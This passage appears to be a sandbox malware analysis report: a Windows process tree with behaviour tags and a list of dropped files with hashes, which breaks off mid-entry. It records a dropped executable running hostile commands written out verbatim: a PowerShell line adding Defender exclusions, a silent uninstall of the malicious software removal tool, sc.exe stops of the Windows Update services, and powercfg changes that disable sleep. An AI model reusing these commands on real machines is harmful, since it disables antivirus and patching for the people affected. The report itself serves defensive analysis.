                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                              1⤵
                                                                                                                                                PID:1484
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                1⤵
                                                                                                                                                  PID:2716
                                                                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1924
                                                                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4068
                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2820
                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4896
                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                          1⤵
                                                                                                                                                            PID:568
                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2916
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                              1⤵
                                                                                                                                                                PID:452
                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                1⤵
                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                PID:468
                                                                                                                                                                • C:\Windows\system32\srtasks.exe
                                                                                                                                                                  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:1072
                                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                                1⤵
                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:1480
                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                C:\Windows\System32\svchost.exe -k swprv
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2548
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3000
                                                                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:1628
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4720
                                                                                                                                                                      • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                        C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1080
                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:2684
                                                                                                                                                                          • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                                            C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4832
                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:2424
                                                                                                                                                                              • C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
                                                                                                                                                                                C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                PID:3476
                                                                                                                                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:3348
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4252
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5600
                                                                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:5896
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:5588
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:5884
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:520
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:2396
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:3856
                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Power Settings
                                                                                                                                                                                        PID:5964
                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Power Settings
                                                                                                                                                                                        PID:5968
                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Power Settings
                                                                                                                                                                                        PID:388
                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:4588
                                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Power Settings
                                                                                                                                                                                          PID:1912
                                                                                                                                                                                        • C:\Windows\system32\dialer.exe
                                                                                                                                                                                          C:\Windows\system32\dialer.exe
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3500
                                                                                                                                                                                          • C:\Windows\system32\dialer.exe
                                                                                                                                                                                            C:\Windows\system32\dialer.exe
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4536
                                                                                                                                                                                            • C:\Windows\system32\dialer.exe
                                                                                                                                                                                              dialer.exe
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:6068

                                                                                                                                                                                            Network

                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                            Downloads

                                                                                                                                                                                            • C:\Config.Msi\e58077e.rbs

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              418KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              1a61490f49deee9429a7661f28339822

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              048395249b1e31b23a7830dc1453a663e0f2913d

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              fd27335fb70a07ba1149f0a533978ab170f5459ea0b636e974fd99cf1657cf93

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              02609e3dbad30322bef05771f60b4d3575f767f34eaa7312b87f5abcc9e1799f4cd88ea591325529bf9bbb1a61d22dbf698723f82239f681a78a917e6e7fbaac

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Application\Languages\cs.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              5bd2daadcc95d02b313ab408f69c0cdd

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              67caef81cd36414de21c6da9ee8dddff8de7f543

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              fab8db28a3d3b192ed385bbc7e51e4939f694e99cf33fd8aa12f3c0f431baeb1

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              a83e5fdf620ddc5973232c9c82a91a176c215e4315546f7b2bb679b9cc44a802c2373428b37e54059a3fedae400b09860cafe00d091789415ed8d39066f627d6

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Application\Languages\de.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              4KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              8faa5b93673b63a8e49cf1bc44e74847

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              41d3986b4b0e55455bae3c9ed772a72ce8d70edd

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              aee0de78527a323a58d2ac4085320c929615a31a016d50aa42103a71d5d58f86

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              ad3ae87c11bb1c8d5745877f9b8b5311f8422cad36654e926decb78fd20b5f123ca1c97e233436ada5e3cdb6015c23e03d2fe3324a815dcead289ac06dc9685d

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Application\Languages\en.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              667c980f8cd8188a655d021694e2827b

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              18ff11f478a31c28f3ca0391bb2c881591c473eb

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              6ec7238938fc876381377aa8721305599756fc728843468132f2f42ad247593e

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              794c476816fb5641d69538f7e802205989f6df4cae2be4c0e67cbc2771e56b488921cd510e775eb65166866e882126f3b69068383c89224e9e5a0ac8322c1dd1

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Application\Languages\es.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              427ecb20be96e8ad36285ab3f99868ea

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              9658bfcff5ecae656f581f7fc425ef043aa8493a

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              a2cd4991bfcf6c9d72e359a65ca6bb408ceca577676269bb0fd564a7e0991eee

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              a8f3e05ae2afeddbdbee236bf4a88eb76c3b94f09331f9fc61dedc4f48775efa99399c4b8ab8cd4cc76b3da483d389b444716fde383f8e46f35321b0e4b17936

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Application\Languages\fr.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              4KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              02d2be951b75bd1d079f14087df679c9

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              cc8b581c9156605cc492f2421e9e8475672af70a

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              bcfef812de24932c9f401473a2ba720625cd5acb23ceecf35783271db1eb51cd

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              bb3dd5009fcd9219db5c554eb36023c33281e6ab7756945bc083b08e7cb3de270475226a20cd95a07b045ceaa8f7abc58f19944f30386aac8e75d91324ee0c79

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Application\Languages\it.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              747aa9090eb43a1b464ab98b57ab10e4

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              d67ff1b4e2a48194c7f66cdec0610bf75c3c42c0

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              7b8259b01e5a4dc853df01a2d4062c64ca61f27583db41bd827fafcf74284727

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              47d4a0aa240758be5864b03c27859d17037e1dfb7af99b494086ed248b82250165abedd7ad6a8a88f5503c77c61a72b4d7aef76b62a3a65ffeb1229a113dd071

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Application\Languages\pl.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              ffd2fa67986045e5b906e6e69d829842

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              90e90d0e35eb4f4b926205b79a86def2ab189537

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              6fdf181f4979735be4c23c0d9c7fdb2434be32e66ece83945cb258ef0386e99c

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              bbb9d4cfecf9e748a4b85705f392bd96840a5a10b80c4a6959695ccb92076c8d39a756ed910fb69ea6d43f630907518ccab7626d20a54112e47172e2ab08296c

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Application\Languages\pt.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              e28e61fd9e47fbf444d913fccee788f2

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              d8e67acfa196d635d7983d7d91e15fa1ca6b3a26

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              66411dd0010b8edab646d53a42f40365509715ca0c173b04279133ccc84b9a9c

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              72ca226e2fb8bda1c24133bf47d68d6ccee30ba56b42949efdbedab9e0ae28d48398b4ce0785a1ec641ff7fc41f40f37788fa032b9febe72229ce80a199d5fc1

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Application\Languages\ru.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              bd10e1d40a8abc119cc3f7ee6f8c30c5

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              5ce745c976083eb5dedb08e2f7a42e2b18109a4a

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              76fae17e487b163ca7cfce3e3e9a25aaf51c8e5addaabd4ce235717d3486e3b1

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              c73fe1bfd77ad6207fa3ab7bb77c55f82e08caaceb6306050764384d9c27a216b349cde99e63fedf94d57cc7331bc392885cec69c70c515aafc158834a84ad6e

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Application\Languages\zh.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              34d15336f4acea86e935cdf01e2a3739

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              99e8af92c43819ccf5e4cb6e28346b8a524deb31

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              ce0ae4195b24c29341560922e0c7b33a1ac9218d72edde10e6733963e61f6b4a

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              805b7acb92d0cedb4d854ad985512c7c79d0e3fb96dd7f92a86fdb28ebd9c5e2cac4736fb6f2ec7365d1f4f93d233c5cfb1fb1b20ee63fd3a925624d075bde6c

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Interface\colors.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              703B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              109bca6c9ed654d5d684290fc909bed1

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              fb6f36ff383cb4b5b718b307594afa02071c5897

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              f11600d990ce9320da8997bec908cbfa649a44074db5a8f1c7f77a731f74fb60

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              1b2c1a0b5178d9174df03f46b6db70b7f33500e100e616bd0a2942c48497695bbceb4bef90d24e3c53d281aae9bb01a9aea8eaa1ac00d8d8b9e6a79040a68366

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\ar.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              9KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              45a616d3bea01c0f03b26eaa44c658c6

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              a06e2fc5fbea47d48643b5bf0752ebb7f656c3a7

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              065670a8045fdeaa953f14db157cb406cfa7d2fcbc210806e728d7f2ffa71bd8

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              3aeae5852ccdfb804b9cf21da57b549276b5c34cff6889033fced54cf0aabcd973a8fde49eb89df4a110c5f1271464e3ee0d913b160eed70800d9954d4d2ead3

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\cs.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              10KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              4a0dccfd59f71bd3831d776206e21fef

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              f29435a647a1edaa91d5a3aa5b82d8c4f97eff4f

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              9f4842373cd11795324a083c0b025caf82a8c74a43a5d844e387eb5bbd548509

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              0e993ce84dccd76b3297b427e3b98e086c4a050d202194f653713da7e201f62978ca26785232d6b7299f857675cb573bb22fc35a80e01080fe879f8f9f0f65be

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\de.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              12KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              88188d4e164f4bd7673cab8a40af4dd0

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              ff5349165480f6ebbe3bd7dd6ee0f5aea669e7f4

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              8c7e490d7346c1db36fff81752a9ba28f08e29de3008110d2a87ec5958af691f

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              6ae4239e448dd3b3044202c5ec147aa38786a60543ec9d6663ac49aedb6e43302bd461ff8894c1fa5109383d9024961d4ae5f61e598a80ef28624b742b848cdd

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\el.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              12KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              e3c5ce9434ecb5321e0d6795eb315e69

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              bc927c12543c89c41201ee1fec91ab7910e7bcce

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              94fc20a30f617c78046e994061addfba673edd4b9704222637ec407208969c66

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              08fcfd5321720e66f14bf1a89e7b4c7f17387c80988541d8b6bde0e151ef27ecc4c2df3bcf2ce1d7c58f7e6622c23bee82694718fbab9debc572ca07118767f7

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\en.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              10KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              61e2aed3a5e00b0a84a13da089bde1df

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              9a500f5d43252e2a6698a2b19dfa72d4b7fabbb4

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              4b49b8b6f1c984f896170fe86221b8c09693a51dd42a216351ae2a1acbb7d94f

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              57457db24faa114865de2a17baa28c18d7c2fdc545fe8b55b2944b1ff1ec3913187415df66831fc5915e6bd5e8decaf9e467a822ca674b96a6307a13ebd683b2

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\es.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              11KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              fc7d679eda2ecd72a3360365561465c9

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              434e66cc4c940f241c7f78b13b18020513da4bfe

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              f8a9e215f77c02e1499428629e5141fe5006d050ca883d8960d9b4a485c045e5

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              145ef09b7613af8883f6b2e14f1e375c969d46f707b0c1614095048797ce2c91b2b647d22ad8bffa738ff1fc0559915fb5396e2ad6f2cbd81c90d54e670924a2

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\fr.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              12KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              1cce17c99651856c68b2cdb05524fed1

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              0d565e71e86cc83a2a2ddc7e3dacf894268730d9

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              ee9d39139279d0709902b6c5c89ae7933237c18627e9af3adc3922c4ee9162e1

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              039c21c320452c379f85d5f1c01b918025a9ba12a120a9bb4d097fb3bd7f8ecb8c8ec0a47e21569fb55728365f2ae42382994f3ad14015db1894c0b8543e1c56

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\hu.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              10KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              48a93b98d74d923b0b2af88fe4d0b4b3

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              eb9d8dab6bc16fd1f42fd63f3c14ca63013e3269

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              54276c9ccbe30eed907a4a510ee4856cb95a1ca634985718b9598fabb2ce6d65

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              e6db1d845507d3d0db50facc5d99db61ff46013cc8bd543b8b8f8403d25c5d9f91bc9c663f7397f6194f712fd5bd488eb80b0a8683d50b102d01603969b6c960

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\it.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              11KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              28ca307fee46c35f35eee4e2e85b408e

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              80c30f1a57e01f64960e4b7ed23a319b5663813d

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              c14b496334bc4652d1858fc815a558d3f77236f3eee48254958fc5e48b60e6c9

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              ca2b2e50d70a11cd807147161f55570ef0c85c34f598a9fa01f45f3411f1a85ee0676665f3e0cbbe46d863cc81c4c65deec816b4cab94631e80df6c5c6616e4f

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\ko.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              c3c7900d515ad18c203ed1f9788bbd1d

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              a25e4da62cbf63005c9b552d3a06b4db768d9a4c

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              33d01f4f2acf21bafe80857492a52bdf953135e2c83277459795bd9818608ec9

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              2d3b0be6c0118588a5483b50d9023ffee77ea817fef3e62af9e84ff77601ad465bc4e7da35a52012d2ab9c97a2057bd2222b5cf890c691b573c7e6d0983f5bb0

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\nl.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              10KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              039d85835781eb2d65c1cf647ed7c8e8

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              7f4cdc09761fc6b354d7f566fb9d5c2b497e31f1

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              830e42a461519069dc40c6f3fa3ae382493aef06d62858bc056d9dcc1ebe2a75

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              80878561ab8e04e75661bb9d0cde94b99a383131d3618e15bd0d07f544321db0c1181f8433f5f0c03af8cbc4b9671cb02763206fcdf744f33cd361459e546ff4

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\pl.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              10KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              764b94eaf19e890c6c83185a055adaa7

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              2a57361c51ea0bffafb7ebcf6fb90b22cbcfb4cb

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              084b1aeb71b0cb2fb6cc5e1379a432b1a89ba55be92f117a950e8e590e05c8b0

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              f5277a938aadc8cab54e344d038146050f83fdb1b6dcef67ecb2bdd23c59aabd879f9f5c37c21b91413d1b45d37ad3e1c427fb3648b4f62872b7e3045ffa5e77

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\pt.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              10KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              9e0668b230f3dcc52c11b8d0ed2fb216

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              b719175c40e72b388359427ae198df51c0caa83a

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              893010e13904c96ae43b3e057467e378146f5b98466d0aad9ca04fb82640a8c2

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              f97892586dc4ca088317ab4c22257bfdfc00f4ea2211268f9c88f6999115d2362aea70af539841fc4bad387280949fb419674900a71b59312b8b5f3c2b6e57f0

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\ru.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              11KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              4b28cf5972728e6966e9edf02d00ecc1

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              22d254f47d15c54751e125aa72245e5b475d9b0e

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              5cad1998ea857a988d64bf065c86ce7907d70b09c836d45f504defa4cc35cf76

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              7afd9f4001dc90fdbf800435822d2a03e51a9f60d5e8de5f70bb9fb55e6fce058ef8fc4ee4aa44f36f1a11df563b5f594ce896d885dd03e7e77f6058452d6696

                                                                                                                                                                                            • C:\Program Files (x86)\Secure Delete\Framework\Languages\zh.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              b0f9d81dd747c71757ee09129d40f843

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              190142aa31fe5cfabd9dddd2cd7fe2d31e86367d

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              7f02e7838f7167e67a29aa35ef865d396e82fff6b5dc68f8ef2efa6dfa549900

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              22ae7015711da16fbea1c469ba8817acf26ff890aeaea135e7e3bc55a27a61b0b785651ec3d0b51286fa40b99f785232cfc47484ec4a9f9aa515cd4884bd0a27

                                                                                                                                                                                            • C:\Program Files\Cuis\bon\Bara.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2.4MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              b70a5e7260b025e39b8016523a1f2d64

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              aea86a6e4d9ba908d9e141a5d4166ba1e3b1b6a7

                                                                                                                                                                                              SHA256

